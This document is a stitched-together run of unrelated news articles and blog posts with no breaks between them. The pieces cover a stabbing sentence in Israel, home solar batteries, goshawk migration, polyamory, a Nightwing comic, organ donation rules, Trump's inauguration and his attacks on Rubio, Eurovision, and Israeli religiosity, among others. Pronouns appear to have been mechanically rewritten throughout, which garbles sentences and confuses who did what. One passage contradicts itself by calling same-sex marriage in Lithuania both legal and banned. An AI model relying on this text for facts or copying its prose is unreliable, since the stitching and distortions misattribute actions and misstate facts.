Details of the case emerged on Monday when an Israeli court sentenced Ahmad to 12 years in prison for their role in the October 2015 stabbing attack that critically wounded an Israeli boy , who was 13 at the time , and an Israeli man . Hassan was fatally shot by police as they ran at them with their knife near the scene of the stabbings .
Grainy security camera footage that partly captured those events provided some of the most enduring images of the wave of violence that began that month and has since largely subsided .
Home battery storage to 'revolutionise ' solar industry in Australia : Climate Council report
Updated
Coupling solar panels with home battery storage could be the cheapest way to get electricity within three years , according to a report by the Climate Council .
The environmental not-for-profit found battery storage would `` revolutionise '' the way Australians accessed electricity , allowing homes to become more independent of the traditional grid .
Report 's key findings : By 2018 , going `` off-grid '' could be cost competitive with traditional grid
Coupling solar panels with home battery storage could be the cheapest option
Half of all Australian households tipped to adopt solar
Switch to solar expected to accelerate as battery cost drops
With battery storage capacity expected to grow 50-fold within a decade , the report found going off-grid could be cost-competitive with staying connected as early as 2018 .
As feed-in tariffs are phased out and grid electricity becomes more expensive , Australia could be the number one market for home battery storage by the same year , the report found .
`` Anyone who has PV [ photovoltaic cells ] on their roof knows they 're paid a fraction – maybe a tenth – of what it costs them to buy power off the grid , '' the Climate Council 's Andrew Stock said .
`` If they have a tool , a battery , that can allow them to store the surplus power during the day and use it at night , it means they 're going to get greater control than they already have over their power bill . ''
In April , US-based technology and automotive company Tesla unveiled Powerwall , a cheap lithium-ion battery , soon to be churned out on a massive scale in a giant factory being built in Nevada .
The battery is estimated , with add-ons , to cost about $ 5,500 .
By 2020 , the factory is expected to produce 35 gigawatt hours ( gWh ) of lithium-ion battery storage each year , more than the entire worldwide production of the batteries in 2013 .
Tesla , along with another of the world 's biggest home battery manufacturers , EnPhase , has announced Australia will be its first market .
Half of all households to adopt solar : report
The Climate Council also found half of all households were predicted to adopt solar systems with battery storage , with the market potentially growing to $ 24 billion .
Mr Stock said the technology would be disruptive to existing network operators , and some companies were already altering the way they priced power to discourage solar and battery combinations .
`` This is perverse , because battery systems , coupled with PV , can actually help networks get much better use out of their assets by smoothing out the demand on the grid , '' they said .
`` That should mean that network companies do n't need to invest anywhere near as much at adding capacity in the future , and they get better use out of the existing capacity . ''
In May , AGL , which owns Victoria 's biggest brown coal generator , Loy Yang , announced it would market its own battery .
It has also begun offering customers solar panels without upfront fees .
`` It 's really important that the traditional players in the industry see this as an opportunity instead of a threat , because if they look at this as an opportunity they 'll be thinking 'how do they leverage this technology into their businesses ? ' '' Mr Stock said .
`` If they see it only as a threat , that will put back Australia [ from ] potentially being a leader in the uptake for up to a decade , and I 'm not sure we as a country these days can afford to put ourselves in a position where we 're a laggard , when we could be a leader . ''
Battery providing 'zero dollar ' power bills
Michael McGarvie and their wife Maria installed a 16-bank , 14.4 kilowatt hour ( kWh ) carbon-gel battery system at their home at Eaglemont , in Melbourne 's east , in April .
After an energy-intensive winter , they said their house has been completely self-sufficient so far this October , meaning they owed nothing to their electricity provider after fixed costs .
They expected their house would be powered completely by their solar and battery systems for nine months of the year .
The McGarvies paid $ 30,000 for the system , which includes a power inverter and 24 solar panels , a cost they acknowledged was beyond the budget of many households .
`` When the battery prices plummet , which they 're due to do , I think it will be an economic decision to swap to PV and batteries , '' they said .
`` Within 10 years , which is the predicted life [ of the batteries ] , the technology will be so brilliant that the replacement system will be much less than 50 per cent of the price , and probably much smaller . ''
The report also predicted the switch to solar would accelerate as the cost of batteries continued to fall .
Amanda McKenzie from the Climate Council said while that would be a key factor driving the take-up of battery units , people also wanted to `` do the right thing '' .
`` People who are using solar on their roofs are people who are trying to beat their electricity bills ; it 's people with mortgages , pensioners . That same group of people will be a key market for battery storage , '' Ms McKenzie said .
`` We know that we live in a very sunny country , one of the windiest countries in the world , and that climate change is a huge issue .
`` So people are motivated both by the price , and by helping the environment , so it 's a win-win . ''
Topics : solar-energy , alternative-energy , energy , environment , climate-change , vic , australia
First posted
Earlier this month , I traveled to Duluth , Minnesota to bird with Naturally Avian ‘ s Erik Bruhnke . The timing of my trip was key , and I wanted to visit the well-known hawk watching site , Hawk Ridge , at an ideal time to see Northern Goshawk . The hawk count at Hawk Ridge is run by Hawk Ridge Bird Observatory , and Erik is employed by HRBO as a count interpreter , so it was a perfect opportunity to spend some time at the ridge . Hawk Ridge is known for getting very high numbers of raptors ( including Broad-winged Hawks and Sharp-shinned Hawks by the thousands ) , but the site is most well-known for its high numbers of migrant Northern Goshawks .
Northern Goshawk are our largest accipiter ( picture a sharpie on steroids…yea , it 's scary ) . They are a very wide-ranging species , and they eat anything from small mammals to large birds . In the northern parts of their range , the bulk of their diet consists of Snowshoe Hare and Ruffed Grouse , both of which share its boreal forest habitat . For this reason , Northern Goshawk numbers are very cyclic , being closely tied to the availability of Snowshoe Hare . “ Irruption ” years can happen following periods of a Snowshoe Hare crash , as birds are forced south in search of prey . However , there has not been an irruption of Northern Goshawk for quite some time , and at Hawk Ridge and other sites , a downward trend is noticeable . Like many raptors , Northern Goshawk are very sensitive to human disturbance , and in particular , prefer large trees of old growth forests for nesting . As with decline of most species , it is likely a combination of factors that contribute to the decline . In this case , it may be a consequence of habitat loss and fragmentation ( possibly due to logging and disturbance ) , in combination with prey availability ( which may also be adversely affected by logging ) .
According to eBird , Northern Goshawk numbers in Minnesota peak during the week of October 22 . My trip was during the week of October 8 through the fifteenth , so I arrived just before peak Northern Goshawk migration .
I was able to spend two full days at Hawk Ridge , on October 11 and 14 . On October 11 , Sharp-shinned Hawks dominated the flight , with a total of over 300 individuals for the day . Temperatures were unseasonably warm , in the 50 's and 60 's , and southeast winds were not really ideal for migration . However , among the stream of tiny sharpies , a handful of giant Northern Goshawk were hard to miss . The counters tallied 5 Northern Goshawk migrating by , and the few individuals I observed in migration were all juveniles . On October 14 , conditions still were n't great for migration , with more southerly winds , and cooler temperatures and overcast skies that just were n't conducive to producing any uplifting thermals . Sharp-shinned Hawks still dominated the flight , but Red-tailed Hawk numbers were up and nearly equal to the sharpie flight . Only four Northern Goshawks were counted on this day , and unfortunately , I missed two during an ill-timed bathroom break .
I did n't get any winning photos of migrant goshawks , besides the above photo of a bird being released . Also , I did n't see any adults , but the banding station had a few juvenile birds on hand for an up-close look . Northern Goshawk do look big and chunky in flight , and not surprisingly their massive size is impressive in the hand ( especially after observing a Sharp-shinned Hawk in the hand ) . Compare the size of the bird in the first photo below ( Sharp-shinned Hawk ) to the size of the bird in the second photo below ( Northern Goshawk ) , in relation to the hand of the person holding each bird .
Northern Goshawks have a bulk to them that make them look like they could swallow a small Shap-shinned Hawk in one chomp . For general comparison , the wingspan of a Northern Goshawk is closest in size , on average , to that of both the Northern Harrier and Red-shouldered Hawk , and falls short of a Red-tailed Hawks wingspan by about 8 inches . However it is their bulky wingy shape and stocky body that gives them such an intimidating look . I still hope to photograph more Northern Goshawk in flight , so I will just have to make another trip to Hawk Ridge next fall , and I will hope to get lucky this season in PA . In the week following , the high count for Northern Goshawk was 12 ( on October 18 ) and 100 individuals were tallied for the month of October .
When I met my first metamour , or partner of a partner , I was terrified . They were the first girl Joel went on more than a few dates with and I wanted to meet them because I knew that getting to know them would allay some of my fears and jealously . We 'd exchanged some messages online so I knew I would like her , but that stomach-cramping , heart-racing feeling I had while waiting for them to meet us at the the bar made me want to go home and forget the whole thing . Maybe I was better not knowing ; maybe we should have a don't-ask-don't-tell policy . Maybe being poly was n't actually my thing after all .
And then they came through the door , and in the minute it took them to walk to our booth , my jumbled mass of thoughts clarified into one : . Fifteen minutes later I not only realized I was n't jealous anymore , I realized Iher . We had a lot in common , made each other laugh , and both liked so many of the same qualities in Joel . A few days later they and I went on our first date , and though she 's not dating either of us any longer , I now consider them one of my closest friends . As with many things in Joel and my relationship , meeting metamours got so much easier after that . ( I met the most recent one randomly when I ran into them on their way out to dinner . It was no big deal . It was a quick , `` Hello ! '' and smile and wave . I walked away grinning stupidly at the awesomeness of our lives . ) But as with many things in Adam and my relationship , the metamour situation was a little more complicated . There was n't fear of the unknown - I knew their wife before I met him , in fact - but once Adam and I started dating , things shifted for me in how I thought about them They were no longer just my friend - now they were the wife of a guy I 'd fallen for really hard . I stopped feeling like I could talk to them as freely as I used to . I felt awkward around them at parties . Instead of embracing them as my newfound metamour into being all those great things they were before , I pulled back from them all together.But of course becoming more distanced from them made me feel worse , so with some prodding from Joel and Adam I decided to just tell them about everything : about how this was my first time dating a married man , my first time being a secondary to anyone at all , and on top of it , my first time in a long time feeling the way I feel about their husband . Them response was not surprising , and made me feel silly for having waited so long to have this conversation : A few days later they and I met for dinner , and my anxiety was gone . We got to know each other even better . They told me stories about their past that did n't make my stomach clench . And , best of all , we talked a lot about how great Adam is -- how cute they are when they do or says or wears something , and how much being with them makes us both happy . It might have been the delicious German beer we were drinking , but that dinner left me so warm and fuzzy I was mushy for days.Since then , I 've obviously felt closer to Adam 's wife but also have felt closer to Adam , because I knew for a fact that everyone involved is rooting for us . It 's not that I ever felt disapproval , it was that I needed that approval to come from personal interactions with them before I truly believed it . There are still times I feel a pang when I think about the ways that they are close that we are not , but that 's a natural side effect of both being in love with someone new and also being a secondary ( which is something that I 'll probably think about and reflect on more in posts to come ) . At least now I know that I can push back any irrational worries about disapproval and move on.There are two things I 've learned from these two experiences I hope to carry with me when the next challenge comes along : A . My boyfriend and partner are great , and it would make sense that anyone else who agrees with me will also be great , and B. Metamours are n't there to be feared , but to be embraced . They are there to learn from and learn with , support , and commiserate with ( in a healthy , non-gossipy way ) , and best of all , to gush with . Because who better to appreciate the sickening , rambling mush that comes from puppy love than someone else who 's felt it too ? As with everything , becoming comfortable with metamours is challenging . Not everyone will always want to form the close relationships I find the most rewarding . But also as with everything I 've found in poly so far , working at developing those relationships in ways that work best for everyone involved is worth the challenge . I have too many complicated emotions about relationships to go it alone . Besides , how else will you figure out what to get your new boyfriend for theirs birthday ?
Dick Grayson is back to being a superhero in the first issue of “ Nightwing ” from DC Comics , which arrives July 27 . ( Courtesy of DC Comics )
Few comic-book characters have had as many iterations as Dick Grayson , which should come as no surprise when you consider he 's been a superhero since childhood .
From Batman 's kid sidekick , Robin the Boy Wonder , to member of the Teen Titans , an adult vigilante life as Nightwing , and most recently , faking their death while secretly being a globe-trotting super-spy , Dick Grayson has seen and done it all as a superhero .
Batman 's first protege has now returned to basics in DC Comics “ Rebirth ” era , once again putting on a mask in their new series “ Nightwing . ”
Tim Seeley , who wrote Nightwing 's mask-less spy adventures in the pre- “ Rebirth ” series , “ Grayson , ” is reunited with the character , and will be writing from a slightly more “ super ” perspective .
“ The original design of [ Dick Grayson ] is so perfect , they really does translate into so many different genres and potential stories , ” Seeley told The Washington Post 's Comic Riffs . “ I think that 's what 's made them such a fan favorite . ”
( Courtesy of DC Comics )
In the “ Rebirth ” issue of “ Nightwing , ” which debuted on July 13 , Seeley said the character has n't left their spy days behind him .
“ That 's Dick 's [ discovery ] via my own revelation having worked on ‘ Grayson ' and finding out that this character works so well in espionage related genre . We 're adding that skill to [ Nightwing 's ] repertoire , ” Seeley said . “ I think because the Batman characters tend to be so Gotham-focused , there 's some real value in having one of their members who are pretty good at globe hopping and he 's so adaptable that they can go to all of these places and instantly charm their way in . ”
[ For the first time in five years , Batman gets … a day off ! ]
When the first post- “ Rebirth ” issue of “ Nightwing ” hits stands real and digital on July 27 ( Javier Fernandez and Marcus To will split art duties with “ Nightwing ” coming out twice a month ) , Nightwing will infiltrate the Parliament of Owls , an organization similar to the Court of Owls that haunted the Dark Knight during Scott Snyder 's and Greg Capullo 's run on DC 's “ Batman ” series , except they view things on a much more global scale as opposed to just having an eye on Gotham City .
“ With the Parliament [ of Owls ] , the idea was to expand a lot of what [ the Court of Owls ] ideas were , but into this new context of elitist , rich , international cabal that believes they should n't have to follow the rules and laws of the rest of the world because they 're just that much better , ” Seeley said . “ These are people that want to create their own country to not have to deal with the riffraff of the world . ”
( Courtesy of DC Comics )
While convincing the Parliament of Owls that they are working for them , Nightwing will be forced to work with their muscle , a masked man called Raptor , a character Seeley said is a darker version of Nightwing .
“ The relationship we want to play with there is that Raptor will sort of be a reflection of Dick 's relationship with Batman , ” Seeley said . “ He 's someone that is actually more like Dick in a lot of ways than Batman is , but philosophically he 's going to be the opposite . ”
[ As Boy Wonder turns 75 , new ‘ Batman and Robin Eternal ' illuminates the lives of a Bat sidekick ]
Batman and members of the bat-family will play a more prominent role in this series , with Nightwing once again having a brotherly bond with Batman 's son — who is also the current Robin the Boy Wonder , Damian Wayne — and continuing to be flirty at times with Barbara Gordon/Batgirl .
“ It was important to re-establish those relationships right off the bat and to see how that effects the way Dick is handling going out on their own and making their own choices , and how does that affect their desire to be connected to all these people they care about , ” Seeley said .
( Courtesy of DC Comics )
Seeley also plans to explore what it means when someone has been a crime-fighter their entire life , as is the case with Nightwing .
“ We 'll ask how much of [ Nightwing 's ] life is still influenced by being that kid from the circus who never really had a permanent home , who did n't live the standard life of the American teenager before being taken in by Batman ” Seeley said . “ Dick really is sort of the only character who comes into being a superhero as that being the [ only ] job they know . ”
The title of the first issue of “ Nightwing ” is “ Better Than Batman , ” a title Seeley hopes fans will think about .
“ It 's supposed to be a question to a degree . Is this about Dick being better than Batman ? Is it about Raptor being better than Batman ? ” Seeley hinted . “ I hope that as [ the series ] goes on we start to question how many different ways someone can be better than Batman . Is that question of a better friend , father , mentor , superhero ? All those things hopefully come into focus as we go on to the first several issues . ”
Courtesy of DC Comics
Read more :
A writer was brutally mugged — so they turned the crime into a moving graphic novel
A picture of Alexander Betts Jr. in a KCCI news video . ( Courtesy of KCCI )
Sheryl Moore 's son lay on the bed before them Soon , they knew , their 16-year-old boy would be taken off life support — another life lost to bullying .
Alexander “ AJ ” Betts Jr. attempted suicide in July 2013 , the Des Moines Register reported at the time . They died shortly thereafter . Betts 's mother said they had been outed as gay about a year and half before their death . Their friends told KCCI that schoolmates constantly made fun of him , ridiculing them for being gay , for being half African American , and for their cleft lip .
“ He 's different . They do n't add up to what they 're used to , ” Noah Lahmann , the teen 's best friend , told the news station .
Before they died , Betts had a request : Donate my organs . A 14-year-old boy received Betts 's heart , according to a letter Moore received , but they said their eyes were rejected .
A Food and Drug Administration 's guidance for donor eligibility says men who have had sex with men in the past five years “ should ” be ruled as “ ineligible ” for donating certain tissues , labeling their behavior a “ risk factor . ”
Sheryl Moore . ( Mary Willie/Des Moines Register )
“ My initial feeling was just very angry because I could n't understand why my 16-year-old son 's eyes could n't be donated just because they were gay , ” Moore said , according to KCCI .
The FDA 's guidance reflects its ban on blood from men who have sex with men . That policy is a by-product of the AIDS crisis that ripped through the gay men 's community decades ago .
The FDA explains its much harder line regarding blood as such : Men who have had sex with men “ at any time since 1977 ( the beginning of the AIDS epidemic in the United States ) are currently deferred as blood donors ” because “ a history of male-to-male sex is associated with an increased risk for exposure to and transmission of certain infectious diseases , including HIV . ”
Critics have long called the policy discriminatory , but the FDA says it 's necessary : “ FDA 's deferral policy is based on the documented increased risk of certain transfusion transmissible infections , such as HIV , associated with male-to-male sex and is not based on any judgment concerning the donor 's sexual orientation . ”
In the Journal of the American Medical Association , Glenn Cohen , a bioethics law professor at the Harvard Law School , wrote that the United States should repeal the rules about blood . “ We think it 's time for the FDA to take a serious look at this policy , because it 's out of step with peer countries , it 's out of step with modern medicine , it 's out of step with public opinion , and we feel it may be legally problematic , ” they told CBS .
Cohen notes some contradictions in the FDA blood ban : Men who have sex with HIV-positive women or sex workers are banned for only a year .
Last summer , the American Medical Association voted to end the ban . According to Time magazine , William Kobler , a board member for the the association , said in a statement , “ The lifetime ban on blood donation for men who have sex with men is discriminatory and not based on sound science . ”
In an e-mail to Time , a spokesperson for the FDA wrote , “ Although scientific evidence has not yet demonstrated that blood donated by [ men who have sex with men ] or a subgroup of these potential donors does not have a substantially increased rate of HIV infection compared to currently accepted blood donors , the FDA remains willing to consider new approaches to donor screening and testing . ”
Rules , guidelines and recommendations governing organ and tissue donation are not as clear as the FDA 's ban on blood . The nonprofit organization United Network for Organ Sharing ( UNOS ) has a contract to facilitate organ procurement and transplants in the United States . That contract covers “ specified solid organs ” such as hearts , livers , lungs and kidneys , but not eyes , according to the Centers for Disease Control and Prevention . On top of that , it adds , “ Technically , all UNOS policies are voluntary . ”
In Betts 's case , their liver , lungs , kidneys and heart all found recipients . Unlike blood , as long as a recipient gives consent to any associated potential risks ( such as HIV transmission ) after counseling , certain organs can be donated . But because their mother could not confirm to the donor network that their son had n't been sexually active in the five years before their death , Betts 's eyes were rejected .
“ This is archaic , ” Moore told KCCI . “ And it is just silly that people would n't get the life-saving assistance they need because of regulations that are 30 years old . ”
Rain began to fall the moment Donald Trump started giving their first speech as President of the United States on Friday .
Supporters of the new commander-in-chief took Mother Nature 's timing as a sign of cleansing , while their opponents perceived it as the sky joining them in mourning the transition of power . The rain in Washington , D.C. , had been predicted . Trump themselves said they would take the oath of office rain or shine during remarks they gave at a celebration concert on the eve of their inauguration .
The Brief Newsletter Sign up to receive the top stories you need to know right now . View Sample Sign Up Now
“ So , I 'll see you tomorrow , ” Trump had told the crowd at the Lincoln Memorial on Thursday night . “ And I do n't care frankly if it 's going to be beautiful or if it 's going to rain like crazy . It makes no difference to me . ”
Those who gathered on the National Mall to watch Trump 's swearing-in started putting on ponchos and covering their heads from the rain as Trump began their speech about turning America around .
“ We will shine for everyone to follow , ” Trump said .
Contact us at editors @ time.com .
Diagnosis and observation of patients ' behaviour during outpatient visits or hospitalisations strips the diagnostic process of the opportunity to consider their places of residence as their natural environment . In this way , patients present their symptoms and problems outside of the context of their daily life . Community-based psychiatric care , on the other hand , provides a chance to include , in the diagnostic process the environment created by a patient in their home . This image of a patient 's external reality can reflect a certain mental reality . Such elements as furniture and other objects , their number , quality , distribution may reflect the inner mental world of the objects featuring in a person 's mind . In some cases , this can become a valuable contribution to a diagnostic process . A description of three patients , all treated for schizophrenia , has been presented in this paper in order to explore this possible relationship . The first individual , `` Patient N '' lives in a flat in a state of extreme depletion of elements . `` Patient N '' suffers from chronic schizophrenia with severe negative symptoms . The second individual , `` Patient D '' , has been also diagnosed with schizophrenia . Yet their home is filled with a huge number of elements , writings on the wall , things , figurines and objects of symbolic meaning . A closer examination of their psychopathological symptoms ( fantastic , colourful , bizarre content ) and history of their illness ( unstable diagnosis of schizophrenia ) , and unpredictable response to antipsychotics may indicate a dissociative type of schizophrenia . Finally , `` Patient K 's '' main living space is dominated by cats that live with him . Patient K was exposed to physical violence as a child and to them cats represent safe , non-threatening objects . They have been also treated for paranoid schizophrenia . The differences between these patients ' personal histories and the courses of their illnesses are clearly manifested in the way they create their immediate environment .
Signup to receive a daily roundup of the top LGBT+ news stories from around the world
The Lithuanian performance at tonight 's Eurovision semi-finals featured dancers swapping around and kissing their same-sex partners .
Lithuania 's act Monika Linkyte and Vaidas Baumila , performed their catchy country-pop tune ‘ This Time ' , and caused a stir as part-way through , dancers swapped , and kissed their same-sex partners .
Following the performance , Lithuania qualified for the Eurovision Finals , taking place on Saturday .
Eurovision fans celebrated the statement made , given that although same-sex marriage is legal in Lithuania , same-sex marriage and same-sex civil partnerships are banned .
Not the first performance to cause a stir with a same-sex kiss , back in 2013 , Finland 's Eurovision entrant Krista Siegfrids found themselves with a place in the final , following their performance of their pro-equal marriage song , which included a lesbian kiss .
Turkey 's official television station was urged by human rights groups to broadcast the final of Eurovision , following reports that it had cancelled the broadcast due to the lesbian kiss .
It 's official : Chicago 's Old Main Post office , the hulking Art Deco behemoth that stands over the Chicago River and Eisenhower Expressway , is ready to be redeveloped . Yes , you 've probably heard this before , but this time it 's for real . This week , a court has approved developer 601W Companies ' $ 500 million overhaul of the long-vacant property . Earlier this year , the New York based developer stepped in to purchase the 2.5 million-square-foot property as the city was threatening eminent domain to take possession of the property back from its previous owner and oddball British developer Bill Davies .
The building is currently a saftey hazard and a lot of mechanical and foundation work needs to be done . The has been left to rot over the last several years and it seems to catch on fire at least once a year . According to the Sun-Times , the building 's new owner has a series of deadlines to correct code violations . However , the building 's previous owner is on the hook for $ 800,000 in fines for leaving the building in such disrepair .
The Old Main Post Office has represented one of the biggest lost opportunities of the last development cycle , however it now appears that real work is ready to begin to bring the building back to life . 601W 's plan includes new amenities like a large three-acre rooftop park and a fitness center . In addition , the site 's prominent river frontage will see the addition of outdoor cafes and a landscaped riverwalk for the building 's office workers .
Architecture that comes to life in Game of Thrones
SPRING HILL —The idea came in a cough syrup buzz .
Early Friday morning , reports say something told Cory Lee Murphy to kill their father with a hammer while they slept .
Earlier in the night , Murphy , 17 , stole cough medicine from a dollar store on County Line Road and could n't remember how much they took , they told deputies .
Later , they tried to hot wire their grandmother 's car in their home 's garage with a screw driver , a Pasco County sheriff 's report states . They gave up when it did n't work and left the ruined ignition .
Then they grabbed a hammer from the garage and `` was having thoughts of killing their father with it , '' the report states .
But instead , Murphy was trying to leave the house at 18123 Drayton St. when their father , Robert Murphy , 51 , caught him . Cory Murphy bashed them in the head .
Someone called 911 . Deputies found the elder Murphy in the driveway , bleeding profusely . They told them they managed to snatch the hammer from their son and leave the house .
Deputies arrested Cory Murphy on charges of aggravated domestic battery and attempted grand theft auto . They were taken to the Land O'Lakes juvenile assessment center .
Issue 268 - December , 1st 2016
News
From Our Sponsor
Articles
Former CMI initiative lead Greg Dunlap shares a real work example of using Drupal 8 's configuration management system .
If you have been following the chatter back and forth about the Drupal Commerce project and Acquia 's recent partnership with Magento you might want to read this series of posts from Robert Douglass .
Sponsored
Do n't be one of the 60 % of websites that fail to launch on time . Download our latest eBook - A guide for your next website project , from planning to deployment .
Tutorials
`` In this short blog post you will learn how to fix the dependency conflicts when trying to add Drupal Console to a project using the Lightning distribution . ''
A new and free hands-on series from Drupalize.Me covering site building . The course includes wireframes as well as a specification document . Sounds interesting .
Sponsored
This post by Purushotam Rai covers how to implement autocomplete functionality in Drupal 8 , including implementing a custom callback .
James Williams shows us how to replace the default vocabulary listing on a Drupal 8 site . This post is full of useful Drupal 8 code examples .
In this useful tutorial Joel Steidl shows us several access restriction examples in Drupal 8 .
Projects
`` Docksal is an open-source tool created by FFW for defining and managing development environments . It brings together common development tools , minimizes time spent on configuration , and ensures the consistency of local development environments throughout a team 's continuous integration workflow . ''
Releases
Video
Podcasts
Ubuntu - Delivered by Canonical
With Ubuntu 's and Qt 's joint desktop roots , Qt has been used to fuel the re-inventing of the mobile computing experience with Ubuntu on phones and tablets . This experience itself has given birth to a new version of Ubuntu called Ubuntu Core , dedicated to the world of IoT . By stripping down Ubuntu to its core essentials , Ubuntu can now be used on devices with much lower resource requirements than before . Combining Qt and Ubuntu Core equals a tested and production-ready platform particularly suited for IoT use cases , requiring a screen from digital signage , kiosks , smart mirrors , industrial control to fitness equipment .
Ubuntu is truly everywhere – from personal computers , servers and smartphones to the internet of things , clouds , smart gateways , humanoid robots and self-driving cars – and so is Qt . Established in 2004 , Canonical – the company behind Ubuntu – set out on a mission to help open source software reach a wider market by providing services to governments and businesses to migrate , manage and support Ubuntu deployments worldwide .
Dear Reader , As you can imagine , more people are reading The Jerusalem Post than ever before . Nevertheless , traditional business models are no longer sustainable and high-quality publications , like ours , are being forced to look for new ways to keep going . Unlike many other news organizations , we have not put up a paywall . We want to keep our journalism open and accessible and be able to keep providing you with news and analysis from the frontlines of Israel , the Middle East and the Jewish World .
Israel is one of the least religious nations in the world , according to a recent WIN/Gallup International poll of residents of 65 countries around the world .
According to WIN/Gallup International , 63 percent of respondents across the globe identified themselves as religious .
While the Middle East was determined to be the most religious region on earth , with 86 % of those polled describing themselves as religious , in Israel 65 % “ said that they are either not religious or convinced atheists , compared to just 30 % who say that they are religious , ” WIN/Gallup International reported.WIN/Gallup International 's findings seem to directly contradict a 2009 study by the Israel Democracy Institute which found that while religious observance in Israel declined in the decade following the influx of Soviet immigrants after the end of the Cold War , it has since risen and “ to a great extent ” there was actually an increase in those who observe Jewish traditions.More than 60 % of respondents in the IDI 's study indicated that “ tradition is ‘ very important ' or ‘ fairly important ' in their choice of a spouse , ” while 80 % affirmed their belief in God , either wholeheartedly or with occasional doubts.Moreover , 67 % answered that they believe that Jews are the “ chosen people ” while 65 % deemed the Torah and its commandments to be God-given.Ninety percent celebrate the Passover Seder , 67 % are careful not to eat hametz ( leaven ) during Passover , 68 % fast on Yom Kippur and 36 % listen to the megila on Purim.A majority of respondents ( 85 % ) said it is “ important to celebrate Jewish festivals in the traditional manner. ” According to Israel 's Central Bureau of Statistics , 9.4 % of Israelis define themselves as ultra-Orthodox while 10 % are Orthodox , 13.6 % are traditional religious , 22.6 % are traditional nonreligious and 43 % are secular.From these numbers “ you see that the minority are saying that they are secular . Forty-three percent is a large minority but still a minority , ” said Prof. Yedidia Stern , the vice president of research at IDI.Aside from those who are self-identified as either religious or secular , “ the rest are traditional but not necessarily religious by self declaration , ” they explained. “ Eighty percent believe in God.Are they secular or religious ? If we are speaking about [ halachic observance ] , then many are not.But if you ask if they believe God [ is ] relevant to Israeli life and they believe in it , then Israelis are a very religious kind of country , ” they said.Moreover , the political and social baggage associated with religion may drive many who are observant to some degree to disassociate themselves from the religious community due to disagreements over issues of religion and state , they added , explaining that “ there are no black-and-white answers in Israel. ” Asked about the WIN/Gallup International poll , Dan Ben-David , president of the Shoresh Institution and an economist at Tel Aviv University , agreed , stating that it appeared to present “ a binary distinction [ i.e. , yes or not religious ] rather than one of degree – so maybe most people abroad believe in God , and thus consider themselves religious. ” “ Here , on the other hand , the religious ‘ categories ' are already taken by the entire spectrum from traditional to ultra-Orthodox , so even if you believe in God but do not count yourself in one of the officially religious categories , then your tendency in Israel may be to say that you are not religious. ” Different groups have proposed various reforms aimed at making Judaism more palatable to the general public.Asked about the WIN/Gallup International poll , Yakov Gaon , executive vice president of the national-religious Tzohar rabbinic organization , said that while “ there is no disputing that there is an increasing amount of religious alienation occurring within Israeli society… this is a challenge that can be addressed by enhancing our efforts to show all Israelis that religion is something to be embraced and not feared , and we feel confident that through a new approach to Jewish identity and practice , the perspective that many Israelis have toward how they define themselves as Jews will change. ” According to Uri Regev , a Reform rabbi and head of the religious pluralism NGO Hiddush , Israel 's “ religious politics and established , coercive , rabbinate are the main forces responsible for undermining Israelis ' Jewish identity. ” Those who replied that they are not religious were “ mostly expressing their dissociation from those who claim to represent the only authentic and binding Judaism , and from their interpretation of Judaism , ” they said. “ Had religious pluralism reigned , and the promise of Israel 's Declaration of Independence for religious freedom and equality been fully realized , we would have seen many more Israeli Jews embracing the richness of the Jewish religious rainbow. ” Last year Economy Minister Naftali Bennett announced that “ 32 % of first grade students in Israel are haredim , ” while the CBS has forecast that the ultra-Orthodox will comprise 30 % of Israel 's population within the next half century , indicating that religiosity may in fact be on the rise in the long term.The original version of this story reported that Gallup had conducted the poll referenced herein , it has since been corrected to indicate that the poll in question was in fact conducted by WIN/Gallup International.Jeremy Sharon contributed to this report .
Join Jerusalem Post Premium Plus now for just $ 5 and upgrade your experience with an ads-free website and exclusive content . Click here > >
Donald Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe : report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort 's attorneys say they should get less than 10 years in prison MORE returned Marco Rubio Marco Antonio RubioHillicon Valley : Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Trump unleashing digital juggernaut ahead of 2020 MORE 's fire Friday , calling their presidential rival inexperienced and a “ nervous Nellie ” at a press conference and rally .
Responding to a morning campaign rally where Rubio questioned whether the business mogul wet themselves during their argument in Thursday night 's GOP debate , Trump cut Rubio down .
ADVERTISEMENT
“ I watched a part of their little act and he 's a desperate guy . ... They are not presidential material , I can tell you . They do n't have the demeanor , he 's a nervous Nellie , '' Trump said during a Friday press conference .
Pushing back on the Florida senator 's characterization that Trump threw a temper tantrum backstage , the GOP front-runner called Rubio a `` total mess '' backstage during that debate and said they were `` putting on makeup with a trowel . ''
At one point during the speech , Trump held up a water bottle and said , “ It 's Rubio , ” before throwing water over the stage and tossing the water bottle — an apparent swipe at Rubio 's on-stage water breaks during the debate .
And they slapped at their competitor 's lackluster Senate attendance as well as recent polls that put them up big over him .
`` For me to go into Florida and have a 20-point lead over the sitting senator , the sitting senator abandoned Florida , '' Trump said .
“ They elected them as a young senator and before they sit down , they start running for president . ''
Chris Christie , who endorsed Trump during that Friday press conference and introduced them at the subsequent rally , drove the knife in further .
`` President of the United States is not a no-show job like you treated the United States Senate , '' they said to Rubio .
Trump went on to repeat those barbs against Rubio during the rally , going on at length with criticisms of Rubio from the trail , lauding Christie for attacking Rubio during a February debate before the New Jersey governor dropped out of the presidential race .
`` I watched Chris take a man apart and I looked at him , honestly , I thought they were going to die , '' Trump said .
`` He was so scared , like a little frightened puppy . ''
– Harper Neidig contributed
American flag flying again at Hampshire College Copyright by WWLP - All rights reserved Video
AMHERST , Mass . ( WWLP ) – The American flag returned to full staff on the main flagpole at Hampshire College in Amherst Friday , following a controversy that has drawn nationwide attention .
Hampshire College President Jonathan Lash told 22News that the flag was removed weeks ago while a campus-wide discussion was held on the use of the flag as a symbol . They said that the presence of the flag was disruptive to that discussion .
`` The American flag is a disruption for some of the people on campus , for whom it represents the experiences they 've had with racism and injustice , it 's a very frightening symbol , '' Lash said .
Victor Nunez Ortiz , commander of the Amherst VFW , however , says that they see the American flag very differently . Nunez Ortiz was an organizer of a weekend protest of the flag 's removal , which drew about 1,000 attendees . They said that the flag is a symbol of peace , which represents freedom , unity , humanity , and all that veterans have fought for .
Lash said that ultimately , the negative reaction to the decision to take the flag down became even more distracting . They said that they have been involved in more than 15 discussions with staff and students , and the decision was made to raise the flag back up again .
The controversy began following the presidential election , when some students lowered the flag to half-staff . Less than two days later , the flag was burned . The college raised a new flag on the pole for Veterans Day before they made the decision to take it down during the dialogue .
